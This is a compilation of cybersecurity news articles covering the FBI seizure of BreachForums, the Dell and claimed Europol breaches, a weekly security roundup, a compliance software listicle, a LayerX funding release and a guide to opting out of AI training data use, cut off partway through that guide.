Data breach marketplace BreachForums has been seized by law enforcement agencies.

BreachForums—probably the largest dark web marketplace for stolen data to be leaked and sold—has been seized by law enforcement.

Now, both the regular and the TOR domain of BreachForums are plastered with a message telling visitors the site is now under control of the FBI.

The FBI said BreachForums and its predecessor Raidforums was:

> “…operating as a clear-net marketplace for cybercriminals to buy, sell, and trade contraband, including stolen access devices, means of identification, hacking tools, breached databases, and other illegal services.”

Raidforums ran from early 2015 until February 2022. The first iteration of BreachForums was then set up in March 2022 and ran until March 2023, when US law enforcement arrested the alleged operator, “Pompompurin”, in New York.

A new administrator then rose to the occasion and said they were working on a plan to get the forum through the problems caused by that arrest. But on March 21, 2023, the new administrator announced the decision to shut BreachForums down.

Another forum administrator going by the account name “Baphomet” then took over.

According to BleepingComputer, the FBI has also seized the site’s Telegram channel, with law enforcement sending messages to the channel on behalf of the forum’s operator “Baphomet”.

BreachForums was in use just last week for a big name breach when a cybercriminal put up for sale breached customer data taken from Dell between 2017-2024.

We’ll keep you posted on any new developments.

**Has your data been exposed?**

If you want to find out how much of your data has been exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection

 Notorious data leak site BreachForums seized by law enforcement 

By Waqas
In a major blow to cybercrime, Breach Forums, a notorious online marketplace for stolen data, has been seized by the FBI and Department of Justice (DoJ). This unprecedented takedown includes not just the clear web domain, but also the dark web, escrow sections and Telegram accounts.
This is a post from HackRead.com Read the original post: Popular Cyber Crime Forum Breach Forums Seized by Police

The FBI and the Department of Justice (DoJ) have seized the infamous cybercrime and hacker forums **Breach Forums**. This breaking development occurred just an hour ago when the forum’s homepage was replaced by a message from the authorities announcing the seizure.

This seizure differs from previous ones, as Hackread.com can confirm. Authorities have not only managed to take over Breach Forums’ clear net domain, but they have also seized its Escrow domain and dark web domain accessible through the Tor browser.

> _“Breach Forums is under the control of the FBI. The website has been taken down by the FBI and DoJ with assistance from international partners. We are reviewing the site’s backend data. If you have information to report about cybercriminal activity on BreachForums, please contact us.”_
> 
> FBI on Breach Forums

Since this was an international law enforcement operation, the countries involved included New Zealand, Australia, the United Kingdom, Switzerland, Ukraine, and Iceland.

Screenshot: Hackread.com

Furthermore, the FBI has taken over additional communication channels associated with the forum. This includes the official Telegram account of the forum @Breachforums, the group chat Telegram account @Baphchat, and the official Telegram group used by its main administrator Baphomet @OfficialBaphomet to announce critical updates.

> _“This Telegram chat is under the control of the FBI. The BreachForums website has been taken down by the FBI and DOJ with assistance from international partners. We are reviewing the site’s backend data. If you have information to report about cybercriminal activity on BreachForums, please contact us.”_
> 
> FBI on Telegram

Screenshot: Hackread.com

****Arrest Made?****

As of now, the FBI and the DoJ have not disclosed any details regarding arrests. However, ShinyHunters confirmed to _Hackread.com_ that Baphomet is one of the administrators who was arrested and shared Breach Forums’ credentials with the authorities.

****History of Breach Forums After Raid Forums****

Breach Forums drew inspiration from the now-seized Raid Forums (RF), which was created and administered by Omnipotent, also known as **Diogo Santos Coelho**. Following the **shutdown of Raid Forums**, a member known as “Pompompurin” created a new version, opting to name it Breach Forums instead of continuing Raid Forum’s legacy.

After a brief period of success, Breach Forums met the same fate as Raid Forums when it was taken down by the FBI. Its administrator, **Pompompurin**, also known as Conor Brian Fitzpatrick, **was arrested in New York**.

It’s noteworthy that while Coelho continues to face legal battles in the United Kingdom, Fitzpatrick was **charged** and received a 20-year supervised sentence.

In June 2023, Hackread.com exclusively reported on the revival of Breach Forums **under the leadership of ShinyHunters**, a highly notorious hacker group. Since then, the group has been operational, making headlines for several high-profile data breaches and leaks. Notable incidents include:

*   **Dell**
*   **AT&T**
*   **Acuity**
*   **Europol**
*   **Space-Eyes**
*   **Home Depot**
*   **Robert Half**
*   **Hathway ISP**
*   **LA Intl. Airport**
*   **Weee! Grocery**
*   **General Electric**
*   **Facebook Marketplace**
*   **HSBC & Barclays Banks**
*   **Cybersecurity firm Zscaler**

_and 100s of others._

Narayana Pappu, CEO at Zendata, a San Francisco-based provider of data security and privacy compliance solutions commented on the seizure stating, _“_It is highly likely that the forum will eventually reappear under the same or different name. As far as the previously stolen data leaked on the site, I expect that multiple local copies of it have been downloaded by actors participating in the forums, so there’s continued exposure. Beyond that, the forum operators may have backups of this information, unless the FBI/DOJ also got the operators/backups,_“_ Narayana explained.

_“_Most people participating in these forums are fairly sophisticated and would have protected their identities, however, some folks could be tracked based on their IP addresses, telegram account information, email addresses, etc… Therefore, this will likely be a deterrent to some extent._“_

Nevertheless, Hackread.com is closely monitoring the situation. Once there is an official update from either of the agencies involved, this article will be updated accordingly with the latest information.

1.  Finnish Dark Web Marketplace PIILOPUOTI Seized
2.  NetWire Malware Site and Server Seized, Admin Arrested
3.  Hive Ransomware Gang Disrupted; Servers, Dark Web Site Seized
4.  Genesis Market’s Clearnet domain seized; Dark Web site still online
5.  WT1SHOP Cybercrime Market Seized by US, Portuguese Authorities

Popular Cyber Crime Forum Breach Forums Seized by Police

Plus: China is suspected in a hack targeting the UK’s military, the US Marines are testing gun-toting robotic dogs, and Dell suffers a data breach impacting 49 million customers.

Law enforcement in the United States, United Kingdom, and Australia this week named a Russian national as the person behind LockBitSupp, the pseudonym of the leader of the LockBit ransomware gang that the US says is responsible for extracting $500 million from its victims. Dmitry Yuryevich Khoroshev has been sanctioned and charged with 26 criminal counts in the US, which combined could result in a prison sentence of 185 years. That is, if he’s ever arrested and successfully prosecuted—an extremely rare event for suspects who live in Russia.

Elsewhere in the world of cybercrime, WIRED’s Andy Greenberg interviewed a representative of Cyber Army of Russia, a group of hackers who have targeted water utilities in the US and Europe and are said to have ties to the notorious Russian military hacking unit known as Sandworm. The responses from Cyber Army of Russia were littered with pro-Kremlin talking points—and some curious admissions.

A deputy director of the FBI has urged the agency’s employees to continue to use a massive foreign surveillance database to search for the communications of “US persons,” sparking the ire of privacy and civil liberty advocates who unsuccessfully fought for such searches to require a warrant. Section 702 of the Foreign Intelligence Surveillance Act requires that “targets” of the surveillance program be based outside the US, but the texts, emails, and phone call of people in the US can be included in the 702 database if one of the parties involved in the communication is foreign. An amendment that would have required the FBI to obtain a warrant for 702 searches of US persons failed in a tie vote earlier this year.

Security researchers this week revealed an attack on VPNs that forces some or all of a user’s web traffic to be routed outside the encrypted tunnel, thus negating the entire reason for using a VPN. Dubbed “TunnelVision,” the attack impacts nearly all VPN applications, and the researchers say the attack has been possible since 2022, meaning it’s possible that it’s already been used by malicious actors.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Microsoft has developed an offline generative AI model designed specifically to handle top-secret information for US intelligence agencies, according to _Bloomberg_. This system, based on GPT-4, is isolated from the internet and only accessible through a network exclusive to the US government. William Chappell, Microsoft's chief technology officer for strategic missions and technology, told _Bloomberg_ that, theoretically, around 10,000 individuals could access the system.

Although spy agencies are eager to leverage the capabilities of generative AI, concerns have been raised about the potential unintended leakage of classified information, as these systems typically rely on online cloud services for data processing. However, Microsoft claims that the model it created for the US government is “clean,” meaning it can read files without learning from them, preventing secret information from being integrated into the platform. Bloomberg noted that this marks the first time a major large language model has operated entirely offline.

Sky News reported this week that Britain's Ministry of Defence was the target of a significant cyberattack on its third-party payroll system. On Tuesday, Grant Shapps, the UK defence secretary, informed members of Parliament that payroll records of approximately 270,000 current and former military personnel, including their home addresses, had been accessed in the cyberattack. “State involvement” could not be ruled out, he said.

While the government has not publicly identified a specific country involved, Sky News has reported that the Chinese government is suspected. China’s foreign ministry has denied the allegations, saying in a statement that it “firmly opposes and fights all forms of cyber attacks” and “rejects the use of this issue politically to smear other countries.”

The payroll company, Shared Services Connected, had known about the breach for months before reporting it to the government, according to _The Guardian_.

The United States Marine Forces Special Operations Command (MARSOC) is testing robotic dogs that can be armed with artificial-intelligence-enabled gun systems. According to reporting from The War Zone, the manufacturer of the AI gun system, Onyx Industries, confirmed to reporters at a defense conference this week that as many as two of MARSOC’s robot dogs, developed by Ghost Robotics, are equipped with its weapons systems.

In a statement to The War Zone, MARSOC clarified that the robot dogs are “under evaluation” and are not yet being deployed in the field. They noted that weapons are just one possible application for the technology, which could also be used for surveillance and reconnaissance. MARSOC emphasized that they are fully compliant with US Department of Defense policies on autonomous weapons.

The US Marine Corps has previously tested robotic dogs armed with rocket launchers.

Days after a hacker posted to BreachForums offering to sell data from nearly 50 million Dell customers, the company began notifying its customers of a data breach in a company portal. According to the email sent to the people impacted, the leaked data contains names, addresses, and information about purchased hardware. “The information involved does not include financial or payment information, email address, telephone number or any highly sensitive customer information,” the email to affected customers states.

Microsoft Deploys Generative AI for US Spies

By Waqas
Notorious hacker IntelBroker claims a major data breach at Europol. Allegedly, sensitive data including employee info, source code, and operational documents were compromised. Europol has yet to confirm the breach. Could this expose ongoing investigations and endanger law enforcement personnel? Find out more.
This is a post from HackRead.com Read the original post: Europol Hacked? IntelBroker Claims Major Law Enforcement Breach

The notorious hacker known as IntelBroker claims to have successfully breached the European Union Agency for Law Enforcement Cooperation, commonly referred to as **Europol**.

The hacker made this announcement on the infamous hacker and cybercrime platform **BreachForums**, stating that the breach occurred earlier this month and involved highly sensitive and classified information.

Initially, the hacker was offering the data for an undisclosed amount in XMR (Monero), a cryptocurrency favoured for its privacy-focused features. However, at the time of writing, Hackread.com can confirm that **IntelBroker** has revealed the data has already been sold to an anonymous buyer.

**Details of the Breach**

According to the post by IntelBroker, the breach allegedly led to the unauthorized access of a wide array of sensitive data, including:

*   **Personal Information of Alliance Employees:** Detailed personal data of individuals working within various agencies under the Europol umbrella.
*   **For Official Use Only (FOUO) Source Code:** Critical source code marked as FOUO, indicating its sensitivity and restricted nature.
*   **Operational Documents:** Including PDFs and other documents used for reconnaissance missions and operational guidelines.
*   **List of Specific Agencies Compromised:** CCSE, SIRIUS, Space – EC3, Law Enforcement Forum, Europol Platform for Experts, Cryptocurrencies – EC3.

**Implications of the Breach**

If true, the exposure of such critical data could pose a severe risk to ongoing operations and the personal security of individuals involved in these agencies. The alleged breach could also potentially undermine the integrity and security of Europol’s operations, with potential ramifications including:

*   **Operational Compromise:** The leak of operational documents and guidelines could severely hinder ongoing investigations and compromise undercover operations.
*   **Risk to Personnel:** The exposure of personal information of law enforcement officials increases the risk of identity theft, blackmail, and other forms of personal attacks.
*   **Security of Sensitive Information:** The leak of FOUO source code and strategic documents could provide malicious actors insights into law enforcement tactics and technical infrastructure.

IntelBroker on Breach Forums (Screenshot: Hackread.com)

**Europol’s Response**

Europol has yet to issue a formal statement detailing whether the breach has occurred, the extent of it, and the measures being taken to mitigate its effects. **_Hackread.com_** has reached out to Europol, and the article will be updated if the agency responds.

****IntelBroker****

Since the emergence of IntelBroker in October 2022, the hacker has conducted numerous high-profile data breaches, particularly targeting critical infrastructure in the United States. These include the following companies and organisations:

1.  **General Electric breach**
2.  **Facebook Marketplace Database**
3.  **Los Angeles International Airport**
4.  **Space-Eyes,** a Miami-based geospatial intelligence firm.
5.  **Robert Half**, a global staffing and business consulting service.
6.  **Acuity Inc.,** a US Federal contractor headquartered in Reston, Virginia.
7.  **Home Depot**, an American multinational home improvement retail corporation.
8.  **Weee! Grocery,** America’s largest online Asian supermarket, and several others.

Most recently, the hacker also **claimed to have hacked** the cybersecurity giant Zscaler and sold the stolen data and network access to an unknown buyer. However, the company denied any hack while still conducting an in-depth investigation into the claims.

_Stay Tuned!_

1.  Massive Data Breach Exposes Info of 43 Million French Workers
2.  Military Satellite Access Sold on Russian Hacker Forum for $15K
3.  FBI’s Security Platform InfraGard Hacked; 87k Members’ Data Sold
4.  After Denial, AT&T Confirms Data Breach Affecting 73 Million Users
5.  Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

Europol Hacked? IntelBroker Claims Major Law Enforcement Breach

Dell has notified some customers about a data breach reported to include 49 million records.

Dell is warning its customers about a data breach after a cybercriminal offered a 49 million-record database of information about Dell customers on a cybercrime forum.

A cybercriminal called Menelik posted the following message on the “Breach Forums” site:

> “The data includes 49 million customer and other information of systems purchased from Dell between 2017-2024.
> 
> It is up to date information registered at Dell servers.
> 
> Feel free to contact me to discuss use cases and opportunities.
> 
> I am the only person who has the data.”

Screenshot taken from the Breach Forums

According to Menelik the data includes:

*   The full name of the buyer or company name
*   Address including postal code and country
*   Unique seven digit service tag of the system
*   Shipping date of the system
*   Warranty plan
*   Serial number
*   Dell customer number
*   Dell order number

Most of the affected systems were sold in the US, China, India, Australia, and Canada.

Users on Reddit reported getting an email from Dell which was apparently sent to customers whose information was accessed during this incident:

> “At this time, our investigation indicates limited types of customer information was accessed, including:
> 
> *   Name
> *   Physical address
> *   Dell hardware and order information, including service tag, item description, date of order and related warranty information.
> 
> The information involved does not include financial or payment information, email address, telephone number or any highly sensitive customer information.”

Although Dell might be trying to play down the seriousness of the situation by claiming that there is not a significant risk to its customers given the type of information involved, it is reassuring that there were no email addresses included. Email addresses are a unique identifier that can allow data brokers to merge and enrich their databases.

So, this is another big data breach that leaves us with more questions than answers. We have to be careful that we don’t shrug these data breaches away with comments like “they already know everything there is to know.”

This kind of information is exactly what scammers need in order to impersonate Dell support.

**Protecting yourself from a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out how much of your data has been exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

 Dell notifies customers about data breach 

By Waqas
Dell has announced a data breach, while a hacker using the alias Menelik is selling 49 million Dell customer data on the notorious Breach Forums.
This is a post from HackRead.com Read the original post: Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

Dell Inc., the technology giant, has notified its customers of a data breach. According to an email obtained by Hackread.com, the breach affected a Dell portal housing customers’ information and their purchase history with **Dell**.

****Details of the Breach****

Although the company did not disclose the number of affected customers, the data compromised in the incident includes:

*   **Full names**
*   **Physical address**
*   **Dell hardware and order information, including service tag, item description, date of order and related warranty information.**

Email sent by Dell to impacted customers (Screenshot credit: Hackread.com)

****Hacker Claims Responsibility****

The positive aspect is that email addresses, passwords, and banking or card data were not part of the breach. However, Hackread.com has verified that a hacker using the alias “Menelik” on **Breach Forums** has recently claimed responsibility for the breach.

It’s important to highlight that while the connection between Dell’s reported data breach and Menelik’s claim remains unconfirmed, the hacker maintains that this is indeed the same breach and has provided additional details regarding the compromised data. Specifically, Menelik alleges to have acquired the personal information of over 49 million Dell customers. This data comprises:

*   **City**
*   **Full Name**
*   **Address**
*   **Province**
*   **Postal Code**
*   **Warranty plan**
*   **Company Name**
*   **Dell Order Number**
*   **Dell Customer Number**
*   **System shipped date (order date)**
*   **Unique 7-digit service tag of the system.**

Sample data seen and analysed by Hackread.com

****Customers by Country****

Additionally, the hacker disclosed the countries with the highest number of affected Dell customers. These include:

1.  **India**
2.  **China**
3.  **Canada**
4.  **Australia**
5.  **United States**

****Dell Data Being Sold to One Buyer****

According to the hacker, the dataset consists of roughly 7 million rows of individual/personal purchase data and 11 million rows of consumer segment company data, and the rest comprises entries from enterprise clients, partners, educational institutions, and other entities. The data is currently being sold to a single buyer for an undisclosed amount.

The hacker on Breach Forums (Screenshot credit: Hackread.com)

****What Dell is Doing?****

Dell has taken several measures in response to the breach. They have notified law enforcement authorities and engaged a third-party forensic firm to investigate the incident.

Despite stating that they do not believe there is a significant risk due to the limited information compromised, the sale of data containing full names and physical addresses poses a considerable threat to customers.

This type of data exposure not only leaves individuals vulnerable to physical harm but also opens the door for threat actors to exploit the information in long-term **social engineering attacks**.

If you are among the victims of the recent Dell data breach, it’s crucial to remain alert. Hackers may use the stolen information to piece together additional details about you, including email addresses and data from previous breaches, increasing the risk of further exploitation.

1.  Acer Online Store Hacked; 34,000 Customers’ Data Stolen
2.  Critical Vulnerabilities Found in Pre-Installed Dell Software
3.  After Denial, AT&T Confirms Data Breach Affecting 73M Users
4.  Acer Data Breach: Hacker Claims to Sell 160GB of Stolen Data
5.  Trezor Data Breach Exposes Email and Names of 66,000 Users

Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

By Uzair Amir
Simplify compliance with these leading software solutions. Discover features like automated evidence collection, risk assessment, and real-time reporting. Find the perfect fit for your startup or large enterprise.
This is a post from HackRead.com Read the original post: Top 9 Compliance Automation Software in 2024

Looking to streamline your compliance processes in 2024? Many compliance automation software options can help businesses stay on top of constantly evolving data security frameworks and regulations like SOC 2, ISO 27001, HIPAA, GDPR, and PCI DSS. 

Startups and scaling companies alike are seeking tools with built-in audit capabilities and features like automated evidence collection and continuous control monitoring to significantly reduce the effort required for ensuring compliance, as these functionalities not only minimize the time and effort required for compliance but also provide a proactive approach to risk management.

When considering compliance automation software, it’s crucial to weigh key features against your organization’s specific requirements and operational needs. 

Without further ado, let’s dig deeper into the top 9 compliance automation software to choose from. 

****#1 Scytale****

Leading the charge in compliance automation, Scytale offers a comprehensive solution that combines advanced technology with excellent expert guidance. Scytale has features like automated evidence collection and continuous control monitoring and caters for over 20 frameworks. Scytale also stands out for its seamless integration capabilities, ensuring adaptability to varying business needs from startups to established companies. According to customer reviews, Scytale makes the process of getting and staying compliant significantly easier. If you’re looking for an all-in-one solution, Scytale is a top choice.

****#2 Libryo****

Libryo‘s extensive regulatory database remains a standout feature, providing users with access to a wealth of compliance information. Its structured approach to compliance management ensures that organizations can stay informed about relevant regulations. However, its lack of customization options and reliance on manual updates may limit its flexibility in rapidly evolving regulatory environments.

****#3 Predict 360****

Predict 360 distinguishes itself with its predictive analytics capabilities, empowering organizations to anticipate compliance risks and take proactive measures. Its user-friendly interface facilitates ease of use, allowing users to navigate the platform with minimal training. Nevertheless, its narrow focus on predictive modelling may overlook the broader spectrum of compliance management needs, potentially leaving gaps in coverage.

****#4 Complinity****

Complinity offers a straightforward approach to compliance management, with an emphasis on simplicity and ease of use. Its intuitive interface makes it accessible to users across different levels of expertise. However, its lack of advanced automation features and integration options may hinder its ability to meet the complex needs of larger organizations operating in highly regulated industries.

****#5 Risk Hawk****

Risk Hawk‘s strength lies in its powerful risk assessment capabilities, enabling organizations to identify and mitigate compliance risks effectively. Its comprehensive risk-scoring system provides valuable insights for decision-making. Yet, its fragmented approach to compliance management and limited automation features may impede seamless integration with existing workflows.

****#6 ZenGRC****

ZenGRC stands out for its user-friendly interface and intuitive design, making it easy for users to navigate the platform and access relevant information. Its robust reporting capabilities facilitate compliance monitoring and auditing processes. However, its limited customization options and rigid structure may restrict its adaptability to unique compliance requirements.

****#7 LogicGate****

LogicGate offers advanced workflow automation features, streamlining compliance processes and improving efficiency. Its customizable workflows empower organizations to tailor the platform to their specific needs. Nevertheless, its complex configuration requirements and steep learning curve may pose challenges for users, particularly during the initial implementation phase.

****#8 Onspring****

Onspring‘s intuitive interface and comprehensive reporting capabilities make it a popular choice for organizations seeking a user-friendly compliance automation solution. Its customizable dashboards provide real-time insights into compliance status and performance. However, its limited integration options and lack of advanced analytics may limit its suitability for organizations with complex compliance needs.

****#9 AuditBoard****

AuditBoard‘s robust audit management features enable organizations to conduct thorough audits and ensure compliance with regulatory requirements. Its centralized platform streamlines audit processes and facilitates collaboration among team members. However, its compliance automation capabilities may lag behind industry standards, particularly in terms of workflow optimization and data integration.

****Tackle Compliance with Confidence with the Right Solution** **

By now you should have a solid understanding of the top compliance automation software solutions to consider in 2024. While the list covers a diverse range of options, a few key themes emerge. Look for automation capabilities that simplify evidence collection and streamline multiple framework implementation. Compliance doesn’t have to be a pain – the right software makes it seamless. 

As you research different options, it’s important to consider your unique compliance needs and team size as part of your evaluation. Each solution should be evaluated with these considerations in mind to ensure optimal fit and functionality for your company.

And remember, don’t underestimate the value of leveraging dedicated compliance experts with technology. Leaning on dedicated compliance experts makes the compliance process a whole lot smoother, as they’re able to provide invaluable guidance and support. 

With the right solution in place, you’ll find yourself well-equipped to confront compliance challenges head-on, with confidence and efficiency. 

1.  Top Software Development Outsourcing Trends
2.  Deciphering the Economics of Software Development
3.  Technology and Software Redefine Business Operations
4.  Software Support: 7 Essential Reasons You Can’t Overlook
5.  Exploring Software Categories: From Basics to Specialized Apps
6.  Cypago Announces Automation Support for AI Security Governance

Top 9 Compliance Automation Software in 2024

By Cyber Newswire
Early adoption by Fortune 100 companies worldwide, LayerX already secures more users than any other browser security solution and enables unmatched security, performance and experience  
This is a post from HackRead.com Read the original post: LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

LayerX, pioneer of the LayerX Browser Security platform, today announced $24 million in Series A funding led by Glilot+, the early-growth fund of Glilot Capital Partners, with participation from Dell Technologies Capital and other investors.

Lior Litwak, Managing Partner at Glilot Capital and Head of Glilot+, and Yair Snir, Managing Partner at Dell Technologies Capital, will join the LayerX board. The new capital will be used for corporate growth across talent and increasing global market presence. This round brings the company’s total investment to $32 million.

Today’s modern enterprise employees rely heavily on browser-based services and SaaS applications. Yet, these fundamental work activities expose organizations to a wide range of security risks, like data leaks, identity and password theft, malicious browser extensions, phishing sites and more. LayerX was purpose-built to secure and govern browser-based work, from both managed and unmanaged devices.

“We’ve transformed workforce protection for organizations without requiring the transition to a dedicated secure browser. Unlike other solutions, installed in a matter of minutes, the LayerX Browser Extension does not impact employee efficiency, speed, privacy or the browsing experience, ” said Or Eshed, co-founder and CEO of LayerX.

“As the browser becomes more central to the employee, we anticipate it becomes more attractive to the attacker, particularly in the wake of GenAI tools used in browser-related activities,” he continues. “Today’s funding round is a testament to our increasing market opportunity and the innovation behind our platform’s user-friendly approach to a more secure browser experience.”

LayerX’s Enterprise Browser Extension is compatible with all commonly used browsers, including Chrome, Firefox, Edge and others, without requiring agents, a VPN or network modifications. Once deployed, the information security or IT team gains visibility into user activities and can block or restrict any threat in real-time, without impacting the user experience.

LayerX protects against all threats, whether they were inadvertently or maliciously caused by the employee, or whether the attacker originated them. The solution includes an AI engine that granularly monitors the code run by the browser and automatically generates a variety of insights related to user behaviour in the browser.

“Since inception, LayerX showed super fast growth and adoption by the world’s leading enterprises. The company is at the forefront of defense for modern organizations. By protecting the browser, the central productivity application in organizations, from a wide range of new-generation security risks, LayerX can solve acute security problems that have remained unanswered until now,” said Kobi Samboursky, Founding and Managing Partner at Glilot Capital “We believe that this novel solution for securing browsers will replace most SASE and SSE solutions prevalent today in organizations. At an estimated market size of $7 billion, the potential inherent in LayerX’s technology is tremendous.”

“Similar to other successful entrepreneurs in the cybersecurity field we’ve collaborated with, Or and David bring significant experience and knowledge in understanding the technical issues involved in threats to organizations and the motivations of attackers.

Consequently, they recognize that effective security measures should adapt to real-world user behaviors, rather than the other way around,” said Yair Snir, Managing Director at Dell Technologies Capital. “In a world where most computer operations are conducted through browsers, LayerX introduces a creative approach to corporate security that is user-friendly, robust, and easily implementable in large organizations.

This approach transforms the browser from a major vulnerability to strength, facilitating secure work across devices. Our investment in LayerX isn’t just driven by the promising opportunity but also by the potential impact of the company’s solution on organizations, regardless of where employees conduct their tasks.”

****About LayerX****

LayerX was founded in 2022 by Or Eshed, CEO, and David Weisbrot, CTO, who developed web attack and defence systems during their military service. In 2017, Eshed led the exposure of the largest attack campaign in history on the Chrome browser, which involved tens of millions of compromised browsers and even led to the capture and trial of the hackers. LayerX has Fortune 100 clients worldwide.

LayerX Enterprise Browser Extension natively integrates with any browser, turning it into the most secure and manageable workspace without impacting the user experience. Enterprises use LayerX to secure their devices, identities, data, and SaaS apps from web-borne threats and browsing risks that endpoint and network solutions can’t protect against. Those include data leakage over the web, SaaS apps and GenAI Tools, malicious browser extensions, phishing, account takeovers, shadow SaaS, and more.

**Contact**

**Dori Harpaz**  
**LayerX**  
**\[email protected\]**

LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

Some companies let you opt out of allowing your content to be used for generative AI. Here’s how to take back (at least a little) control from ChatGPT, Google’s Gemini, and more.

If you’ve ever posted something to the internet—a pithy tweet, a 2009 blog post, a scornful review, or a selfie on Instagram—it has most likely been slurped up and used to help train the current wave of generative AI. Large language models, like ChatGPT, and image creators are powered by vast reams of our data. And even if it’s not powering a chatbot, the data can be used for other machine-learning features.

Tech companies have scraped vast swathes of the web to gather the data they claim is needed to create generative AI—with little regard for content creators, copyright laws, or privacy. On top of this, increasingly, firms with reams of people’s posts are looking to get in on the AI gold rush by selling or licensing that information. Looking at you, Reddit.

However, as the lawsuits and investigations around generative AI and its opaque data practices pile up, there have been small moves to give people more control over what happens to what they post online. Some companies now let individuals and business customers opt out of having their content used in AI training or being sold for training purposes. Here’s what you can—and can’t—do.

**There’s a Limit**

Before we get to how you can opt out, it’s worth setting some expectations. Many companies building AI have already scraped the web, so anything you’ve posted is probably already in their systems. Companies are also secretive about what they have actually scraped, purchased, or used to train their systems. “We honestly don't know that much,” says Niloofar Mireshghallah, a researcher who focuses on AI privacy at the University of Washington. “In general, everything is very black-box.”

Mireshghallah explains that companies can make it complicated to opt out of having data used for AI training, and even where it is possible, many people don’t have a “clear idea” about the permissions they’ve agreed to or how data is being used. That’s before various laws, such as copyright protections and Europe’s strong privacy laws, are taken into consideration. Facebook, Google, X, and other companies have written into their privacy policies that they may use your data to train AI.

While there are various technical ways AI systems could have data removed from them or “unlearn,” Mireshghallah says, there’s very little that’s known about the processes that are in place. The options can be buried or labor-intensive. Getting posts removed from AI training data is likely to be an uphill battle. Where companies are starting to allow opt-outs for future scraping or data sharing, they are almost always making users opt-in by default.

“Most companies add the friction because they know that people aren’t going to go looking for it,” says Thorin Klosowski, a security and privacy activist at the Electronic Frontier Foundation. “Opt-in would be a purposeful action, as opposed to opting out, where you have to know it’s there.”

While less common, some companies building AI tools and machine learning models don't automatically opt-in customers. “We do not train our models on user-submitted data by default. We may use user prompts and outputs to train Claude where the user gives us express permission to do so, such as clicking a thumbs up or down signal on a specific Claude output to provide us feedback,” says Jennifer Martinez, a spokesperson for Anthropic. In this situation, the most recent iteration of the company’s Claude chatbot is built on public information online and third-party data—content people posted elsewhere online—but not user information.

The majority of this guide deals with opt-outs for text, but artists have also been using “Have I Been Trained?” to signal their images shouldn't be used for training. Run by startup Spawning, the service allows people to see if their creations have been scraped and then opt out of any future training. “Anything with a URL can be opted out. Our search engine only searches images, but our browser extension lets you opt out any media type,” says Jordan Meyer, cofounder and CEO of Spawning. Stability AI, the startup behind a text-to-image tool called Stable Diffusion, is among companies that say they are honoring the system.

The list below only includes companies currently with an opt-out process. For example, Microsoft’s Copilot does not offer users with personal accounts the option to have their prompts not used to improve the software. “A portion of the total number of user prompts in Copilot and Copilot Pro responses are used to fine-tune the experience,” says Donny Turnbaugh, a spokesperson for Copilot. “Microsoft takes steps to deidentify data before it is used, helping to protect consumer identity.” Even if the data is deidentified, privacy-minded users may want more potential control over their information.

**How to Opt Out of AI Training**

Adobe

Adobe via Matt Burgess

If you store your files in Adobe’s Creative Cloud, the company may use them to train its machine-learning algorithm. “When we analyze your content for product improvement and development purposes, we first aggregate your content with other content and then use the aggregated content to train our algorithms and thus improve our products and services,” reads the company’s FAQ. This doesn’t apply to any files stored only on your device.

If you’re using a personal Adobe account, it’s easy to opt out. Open up Adobe’s **privacy page**, scroll down to the **Content analysis** section, and click the toggle to turn it off. For business or school accounts, the opt-out process is not available on the individual level, and you’ll have to reach out to your administrator.

Amazon: AWS

AI services from Amazon Web Services, like Amazon Rekognition or Amazon CodeWhisperer, may save customer data to improve the company’s tools. Head’s up, this is the most complicated opt-out process included in the roundup, so you likely need help from an IT professional at your company or an AWS representative to perform it successfully. Outlined on this support page from Amazon, the process includes enabling the option for your organization, creating a policy, and attaching that policy where necessary.

Google: Gemini

For users of Google’s chatbot, Gemini, conversations may sometimes be selected for human review to improve the AI model. Opting out is simple, though. Open up Gemini in your browser, click on **Activity**, and select the **Turn Off** drop-down menu. Here you can just turn off the Gemini Apps Activity, or you can opt out as well as delete your conversation data. While this does mean in most cases that future chats won’t be seen for human review, already selected data is not erased through this process. According to Google’s privacy hub for Gemini, these chats may stick around for three years.

Grammarly

Grammarly does not currently offer an opt-out process for personal accounts, but self-serve business accounts can choose to opt out from having their data used to train Grammarly’s machine-learning model. Turn it off by opening up your **Account Settings**, clicking on the **Data Settings** tab, and toggling off **Product Improvement & Training**. If you have a managed business account, which includes accounts for classroom education and accounts bought through a Grammarly sales representative, you are automatically opted out from AI model training.

HubSpot

HubSpot, a popular marketing software, automatically uses data from customers to improve its machine-learning model. Unfortunately, there’s not a button to press to turn off the use of data for AI training. You have to **send an email** to privacy@hubspot.com with a message requesting that the data associated with your account be opted out.

OpenAI: ChatGPT and Dall-E

OpenAI via Matt Burgess

People reveal all sorts of personal information while using a chatbot. OpenAI provides some options for what happens to what you say to ChatGPT—including allowing its future AI models not to be trained on the content. “We give users a number of easily accessible ways to control their data, including self-service tools to access, export, and delete personal information through ChatGPT. That includes easily accessible options to opt out from the use of their content to train models,” says Taya Christianson, an OpenAI spokesperson. (The options vary slightly depending on your account type, and data from enterprise customers is not used to train models).

